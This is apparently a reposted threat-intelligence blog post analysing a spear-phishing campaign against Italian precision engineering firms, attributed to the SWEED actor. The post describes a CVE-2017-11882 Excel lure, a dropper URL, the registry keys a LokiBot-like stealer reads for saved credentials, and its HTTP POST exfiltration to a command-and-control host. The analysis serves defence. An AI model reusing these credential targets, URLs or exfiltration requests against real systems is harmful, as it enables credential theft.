Security expert Marco Ramilli published a quick analysis of an interesting attack carried out by SWEED threat actor targeting precision engineering firms in Italy.

Introduction

Today I’d like to share a quick analysis of an interesting attack targeting precision engineering companies based in Italy. Precision engineering is a very important business market in Europe, it includes developing mechanical equipment for: automotive, railways, heavy industries and military grade technology . The attacker pretended to be a customer and sent to the victim a well crafted email containing a Microsoft XLS file including real spear-parts codes, quantities and shipping addresses. A very similar attack schema to MartyMCFly campaign.

Technical Analysis

Hash863934c1fa4378799ed0c3e353603ba0bee3a357a5c63d845fe0d7f4ebc1a64cThreatMicrosoft Excel DocumentBrief DescriptionExploiter, Dropper and Executor targeting precision engineering companiesSsdeep384:janC18qmTUKhKVxbo6JpM2gwmeJxQrHwFeDtug/uND40C2D:janCOqm4tVxE6rM2g0fO2exuxC0FDOn 2019-10-26 a well-crafted email coming from steel@vardhman.com asking for an economic proposal reached specific email boxes belonging to purchasing department of a well-known precision engineering company. Basically the attacker asks to the victims to quote the entire list of spear-parts included in an attached Excel document. The source address looks like genuine since belonging to a big company working in the textile field which frequently uses precision equipment machines in its production chain.

Attacker Spreadsheet looking realOnce the victim opens up the document it would actually see a “looking real” Microsoft Excel spreadsheet. Surprisingly the spreadsheet doesn’t hold Macro code, so no weird message would appear and no weird requests for enabling macros or compatibility-mode would appear on the victim screen. Everything looks like real except for the third object included into the Excel file.

Object-3 exploiting CVE-2017-11882.If you are familiar with CVE-2017-11882, you might notice it immediately, but if you aren’t you might take a look to HERE (for the exploit generation) to HERE (for an example) and HERE (for CVE original disclosure). In a nutshell CVE-2017-11882 is a 17-year old memory corruption issue in Microsoft Office (including Office 360). When exploited successfully, it can let attackers execute remote code on a vulnerable machine—even without user interaction—after a malicious document is opened. The flaw resides within Equation Editor (EQNEDT32.EXE), a component in Microsoft Office that inserts or edits Object Linking and Embedding (OLE) objects in documents.

Once the victim opens the document apparently nothing happens but silently Object3 runs EquationEditor and exploits a memory corruption vulnerability executing code on the running host.

Equation Editor Crashes and Execute CodeThe code execution implements a romantic Drop and Execute code by dropping a Windows PE file from: http[://mail.hajj.zeem.sa/wp-admin/edu/educrety.exe and by running it directly on memory exploiting fileless behavior.

Analysis of Dropped PE File

Hash64114c398f1c14d4e840f62395edd9a8c43d834708f8d8fce12f8a6502b0e981ThreatSensitive data stealerBrief descriptionLooks for stored passwords and tries to push them on command and control serversSsdeep6144:htbOljxWyjJypr+QqhdJdUwcPWFNEwXh/XEVOwG6Fro:h9OXByoXLU7eFNEwREVOJveducrety.exe

The dropped PE (educrety.exe) is compiled by Microsoft Visual C++ and holds an nice icon :P. According to VT history detection the same hash has been seen with at least three different names: educrety.exe, prestezza.exe and cardsharper.exe. ExifTools shows that prestezza.exe is the original file name while the project internal name is: cardsharper.exe. Once the sample is run it harvests information from many registry keys in where vendors are used to save access credentials or access tokens. For example (or for full read RegKeys have a look to here):

[…] HKEY_LOCAL_MACHINESoftwareNCH SoftwareFlingAccounts
HKEY_CURRENT_USERSoftwareNCH SoftwareFlingAccounts
HKEY_LOCAL_MACHINESoftwareNCH SoftwareClassicFTPFTPAccounts
HKEY_CURRENT_USERSoftwareNCH SoftwareClassicFTPFTPAccounts
HKEY_CURRENT_USERSoftware9bis.comKiTTYSessions
HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions
HKEY_LOCAL_MACHINESoftwareSimonTathamPuTTYSessions
HKEY_LOCAL_MACHINESoftware9bis.comKiTTYSessions
HKEY_LOCAL_MACHINESOFTWAREMozillaMozilla Thunderbird
HKEY_CURRENT_USERSoftwareIncrediMailIdentities
HKEY_LOCAL_MACHINESoftwareIncrediMailIdentities
HKEY_CURRENT_USERSoftwareMartin Prikryl
HKEY_LOCAL_MACHINESoftwareMartin Prikryl
HKEY_LOCAL_MACHINESOFTWAREPostboxPostbox
HKEY_LOCAL_MACHINESOFTWAREMozillaFossaMail
HKEY_CURRENT_USERSoftwareWinChipsUserAccounts
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesOutlook
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook92aab115f965648a37b74181b1110f0
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook92aab115f965648a37b74181b1110f0Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlooka0d020000000000c000000000000046
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlooka0d020000000000c000000000000046Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook13dbb0c8aa05101a9bb000aa002fc45aEmail
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook3517490d76624c419a828607e2a54604
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook3517490d76624c419a828607e2a54604Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook77de0b05e2a16d4fb6c76bf01ccd1603
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook77de0b05e2a16d4fb6c76bf01ccd1603Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook79e73bb51ce14d4a82e1f99654d0fc40
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook79e73bb51ce14d4a82e1f99654d0fc40Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook8503020000000000c000000000000046
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook8503020000000000c000000000000046Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook8a1c49cb145d7448927a71ec9112e8a4
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook8a1c49cb145d7448927a71ec9112e8a4Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9207f3e0a3b11019908b08002b2a56c2Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A6676Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000001
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000001Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP Email Address
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP Server
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP User Name
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP User
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005POP3 Server
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005POP3 User Name
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005POP3 User
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005NNTP Email Address
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005NNTP User Name
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005NNTP Server
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005IMAP Server
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005IMAP User Name
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005IMAP User
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005HTTP User
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005HTTP Server URL
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005HTTPMail User Name
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005HTTPMail Server
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005POP3 Port
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP Port
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005IMAP Port
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005POP3 Password2
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005IMAP Password2
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005NNTP Password2
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005HTTPMail Password2
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP Password2
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005POP3 Password
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005IMAP Password
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicescrypt32
HKEY_LOCAL_MACHINESYSTEMControlSet001servicescrypt32DebugHeapFlags
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005NNTP Password
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005HTTP Password
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A66760000005SMTP Password
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookba01e474e967cd44b1abf533b2f10f52
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookba01e474e967cd44b1abf533b2f10f52Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookc02ebc5353d9cd11975200aa004ae40e
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookc02ebc5353d9cd11975200aa004ae40eEmail
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookd8795abf811b0f4ea6b2bf0a97c4cb21
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookd8795abf811b0f4ea6b2bf0a97c4cb21Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookddb0922fc50b8d42be5a821ede840761Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookf86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlookf86ed2903a4a11cfb57e524153480001Email
HKEY_CURRENT_USERSoftwareMicrosoftOffice16.0OutlookProfilesOutlook
HKEY_CURRENT_USERSOFTWAREflaska.nettrojita
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesLanmanWorkstationParameters
HKEY_LOCAL_MACHINESYSTEMControlSet001servicesLanmanWorkstationParametersRpcCacheTimeout
HKEY_LOCAL_MACHINESYSTEMControlSet001servicesDcomLaunch
HKEY_LOCAL_MACHINESYSTEMControlSet001servicesDcomLaunchObjectName
HKEY_LOCAL_MACHINESYSTEMControlSet001servicesRpcEptMapper

[…]

Once it gets credentials it pushes them on a command and control: http[://www.corpcougar.com/edu/Panel/five/fre.php in the following way

POST /edu/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.corpcougar.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: EEABFA
Content-Length: 190
Connection: close

Network TraceConsidering the User-Agent, the net-trace and most of all the pushing path, it reminds me LokiBot Malware. “Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.” – PhishMe. Playing a little bit with command and control it turns out more than one Command an Control was installed on the same domain, each one owns different path and the sample I’ve analyzed was currently using only one path. It makes sense since VT collected different samples related to the analyzed one which would probably include different malware campaigns and different artifact names.

IndexOf C&CATT&CK TTP Summary

Following MITRE ATT&CK compiled according to what find.

Initial Access: T1193 (Spearphishing Attachment)Execution: T1204 ( User Execution )Defense Evasion:T1107 (File Deletion – deletes original file after infection)T1158: Hidden Files and DirectoriesT1045: Software Packing – threat comes packed/encryptedCredential Access:T1003: Credential DumpingT1081: Credentials in FilesT1214: Credentials in RegistryCollection: T1005: Data from Local SystemExfiltration: T1002: Data EncryptedCommand and Control:T1043: Commonly Used PortT1071: Standard Application Layer ProtocolConclusions

According to Cisco Talos (here and here) a large number of ongoing malware distribution including such notable malware as Formbook, Lokibot and Agent Tesla could be related to a singular thread actor called “SWEED”. I did find many similarities including original attack vectors, used Microsoft Office Exploit, implementation of LokiBot and victims type to “SWEED” so that I believe this attack could also be attributed to the same threat actor. Moreover the used techniques and the care of the overall attack, which included a study on the victim products (you remember the real spear-parts in the excel file ?) reminds me a more recent analysis made by Fortinet so that I believe it might be attributed to the same threat actor as well as the described attack.

Finally I think “SWEED” threat actor is attacking Italian precision engineering companies. TTPs and communication schema are so close each other that it’s hard to believe in fortuity.

The original post, including IoCs and Yara rules, is available on Marco Ramilli’s blog:

SWEED Targeting Precision Engineering Companies in Italy

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
});
}
catch (error) {}

Pierluigi Paganini

(SecurityAffairs – SWEED, hacking)

The post SWEED targets precision engineering companies in Italy appeared first on Security Affairs.